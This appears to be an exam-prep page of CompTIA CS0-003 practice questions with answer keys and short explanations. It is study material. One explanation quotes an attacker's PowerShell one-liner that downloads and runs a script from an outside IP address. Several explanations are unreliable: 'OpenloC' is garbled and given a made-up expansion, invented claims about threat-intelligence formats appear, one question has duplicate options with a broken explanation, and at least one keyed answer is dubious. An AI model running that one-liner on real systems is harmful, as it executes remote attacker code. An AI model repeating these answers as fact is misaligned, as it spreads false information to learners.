CompTIA CS0-003 Online Practice Questions and Exam Preparation

CompTIA CS0-003 Online Questions & Answers

• Question 541:

  A third-party assessment of a recent incident determined that the incident response team spent too long trying to get the scope needed for the incident timeline and too much time was spent searching for false positives.

  Which of the following should the team work on first?

  A. Playbook edits
  B. Ticket system automation
  C. Detection tuning
  D. Standard operating procedure refinement
  C. Detection tuning

• Question 542:

  An organization performs software assurance activities and reviews some web framework code that uses exploitable jquery modules.

  Which of the following tools or techniques should the organization use to help identify these issues?

  A. Security Content Automation Protocol
  B. Application fuzzing
  C. Common weakness enumeration
  D. Static analysis
  D. Static analysis

• Question 543:

  A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs.

  Which of the following vulnerability management elements will best assist with prioritizing a successful plan?

  A. Affected hosts
  B. Risk score
  C. Mitigation strategy
  D. Annual recurrence
  B. Risk score

  ---

  Explanation

  Risk scoring is the best method for prioritizing patching, as it considers factors like CVSS severity, exploitability, asset criticality, and business impact. Option A (Affected hosts) is relevant but does not determine priority without a risk assessment.

  Option C (Mitigation strategy) is useful but focuses on alternative protections rather than prioritization.

  Option D (Annual recurrence) is not a standard method for vulnerability prioritization.

  Thus, B is the correct answer, as risk scores allow organizations to prioritize patching efforts effectively.

• Question 544:

  Which of the following explains the importance of a timeline when providing an incident response report?

  A. The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.
  B. An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.
  C. The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.
  D. An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.
  C. The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.

  ---

  Explanation

  An incident response timeline is a detailed chronological record of all events and actions taken during the response to a security incident. It includes timestamps and descriptions of each step, providing a comprehensive overview of how the incident was detected, contained, mitigated, and resolved. This timeline is crucial for post-incident analysis, helping to understand the effectiveness of the response, identify areas for improvement, and ensure accountability and transparency in the incident handling process.

• Question 545:

  Which of the following would eliminate the need for different passwords for a variety or internal application?

  A. CASB
  B. SSO
  C. PAM
  D. MFA
  B. SSO

  ---

  Explanation

  Single Sign-On (SSO) allows users to log in with a single ID and password to access multiple applications. It eliminates the need for different passwords for various internal applications, streamlining the authentication process.

• Question 546:

  Which of the following makes STIX and OpenloC information readable by both humans and machines?

  A. XML
  B. URL
  C. OVAL
  D. TAXII
  A. XML

  ---

  Explanation

  STIX and OpenloC are two standards for representing and exchanging cyber threat intelligence (CTI) information. STIX stands for Structured Threat Information Expression and OpenloC stands for Open Location and Identity Coordinates.

  Both standards use XML as the underlying data format to encode the information in a structured and machine-readable way. XML stands for Extensible Markup Language and it is a widely used standard for defining and exchanging data on the web. XML uses tags, attributes, and elements to describe the structure and meaning of the data. XML is also human-readable, as it uses plain text and follows a hierarchical and nested structure. XML is not the only format that can be used to make STIX and OpenloC information readable by both humans and machines, but it is the most common and widely supported one. Other formats that can be used include JSON, CSV, or PDF, depending on the use case and the preferences of the information producers and consumers. However, XML has some advantages over other formats, such as: XML is more expressive and flexible than JSON or CSV, as it can define complex data types, schemas, namespaces, and validation rules. XML is more standardized and interoperable than PDF, as it can be easily parsed, transformed, validated, and queried by various tools and languages. XML is more compatible with existing CTI standards and tools than other formats, as it is the basis for STIX 1.x, TAXII 1.x, MAEC, CybOX, OVAL, and others.

  References:

  1 Introduction to STIX - GitHub Pages

  2 5 Best Threat Intelligence Feeds in 2023 (Free & Paid Tools) - Comparitech 3 What Are STIX/TAXII Standards? - Anomali Resources 4 What is STIX/TAXII? | Cloudflare 5 Sample Use | TAXII Project Documentation - GitHub Pages 6 Trying to retrieve xml data with taxii - Stack Overflow 7 CISA AIS TAXII Server Connection Guide 8 CISA AIS TAXII Server Connection Guide v2.0 | CISA

• Question 547:

  A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization's environment. An analyst views the details of these events below:

  

  Which of the following statements best describes the intent of the attacker, based on this one-liner?

  A. Attacker is escalating privileges via JavaScript.
  B. Attacker is utilizing custom malware to download an additional script.
  C. Attacker is executing PowerShell script "AccessToken.ps1".
  D. Attacker is attempting to install persistence mechanisms on the target machine.
  C. Attacker is executing PowerShell script "AccessToken.ps1".

  ---

  Explanation

  Rundll32.exe is used to run a JavaScript command.

  The JavaScript command creates an instance of ActiveXObject to run a PowerShell command.

  The PowerShell command (IEX (New-Object Net.WebClient).DownloadString('77.247.109.185/AccessToken.ps1')) is used to download and execute a script (AccessToken.ps1) from a remote server.

  Best Description of the Attack Intent: The intent of the attacker, based on this one-liner, is most accurately described by the following statement: Attacker is executing PowerShell script "AccessToken.ps1"

• Question 548:

  A security analyst receives a report indicating a system was compromised due to malware that was downloaded from the internet using TFTP. The analyst is instructed to block TFTP at the corporate firewall. Given the following portion of the current firewall rule set:

  

  Which of the following rules should be added to accomplish this goal?

  A. UDP ANY ANY ANY 20 Deny
  B. UDP ANY ANY 69 69 Deny
  C. UDP ANY ANY 67 68 Deny
  D. UDP ANY ANY ANY 69 Deny
  E. UDP ANY ANY ANY 69 Deny
  D. UDP ANY ANY ANY 69 Deny

  ---

  Explanation

  D. 69. The TFTP server will then respond on a port higher than

  1024. This is done so there no conflicts with sessions.

• Question 549:

  Which of the following threat actors is most likely to target a company due to its questionable environmental policies?

  A. Hacktivist
  B. Organized crime
  C. Nation-state
  D. Lone wolf
  A. Hacktivist

  ---

  Explanation

  Hacktivists are threat actors who use cyberattacks to promote a social or political cause, such as environmentalism, human rights, or democracy. They may target companies that they perceive as violating their values or harming the public interest. Hacktivists often use techniques such as defacing websites, launching denial-of-service attacks, or leaking sensitive data to expose or embarrass their targets.

  References:

  An introduction to the cyber threat environment, page 3;

  What is a Threat Actor? Types & Examples of Cyber Threat Actors, section 2.

• Question 550:

  Which of the following is the greatest security concern regarding ICS?

  A. The involved systems are generally hard to identify.
  B. The systems are configured for automatic updates, leading to device failure.
  C. The systems are oftentimes air gapped, leading to fileless malware attacks.
  D. Issues on the systems cannot be reversed without rebuilding the systems.
  C. The systems are oftentimes air gapped, leading to fileless malware attacks.